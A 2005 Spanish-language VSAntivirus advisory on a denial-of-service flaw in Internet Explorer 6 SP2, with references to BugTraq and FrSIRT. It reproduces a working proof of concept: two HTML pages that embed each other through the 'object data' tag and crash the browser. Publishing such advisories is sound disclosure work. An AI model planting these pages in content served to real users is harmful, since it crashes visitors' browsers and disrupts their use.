VSantivirus No. 1787 Año 9, domingo 29 de mayo de 2005
DoS en Internet Explorer producido por "Object Data"
http://www.vsantivirus.com/vul-iesp2-objectdata-280505.htm
Por Angela Ruiz
angela@videosoft.net.uy
Se ha reportado que Microsoft Internet Explorer es afectado por una vulnerabilidad del tipo denegación de servicio (DoS).
La vulnerabilidad se presenta cuando el navegador maneja páginas Web embebidas utilizando la etiqueta HTML "Object Data".
El fallo afecta a Microsoft Internet Explorer 6 SP2, con todas las actualizaciones a la fecha de este aviso.
Bugtraq ha publicado la siguiente prueba de concepto:
Página #1 (grabar como "btf1.htm"):
<html><head><title>BTF - MSIE crash</title></head><body>
<object data="./btf2.htm" width="0" height="0"></object>
</body></html>
Página #2 (grabar como "btf2.htm"):
<html><head><title>BTF - MSIE crash</title></head><body>
<object data="./btf1.htm" width="0" height="0"></object>
</body></html>
Software vulnerable:
- Microsoft Internet Explorer 6.0 SP2 (y posiblemente anteriores)
Soluciones:
Actualmente no existen parches para este problema.
Créditos:
Benjamin Tobias Franz <0-1-2-3@gmx.de>
Referencias:
- Identificado en BugTraq como ID 13800
Microsoft Internet Explorer Object Embedding Denial of Service Vulnerability
http://www.securityfocus.com/bid/13800/
- Referencia en FrSIRT: FrSIRT/ADV-2005-0646
Microsoft Internet Explorer Denial of Service Vulnerabilities
http://www.frsirt.com/english/advisories/2005/0646
(c) Video Soft - http://www.videosoft.net.uy
(c) VSAntivirus - http://www.vsantivirus.com
|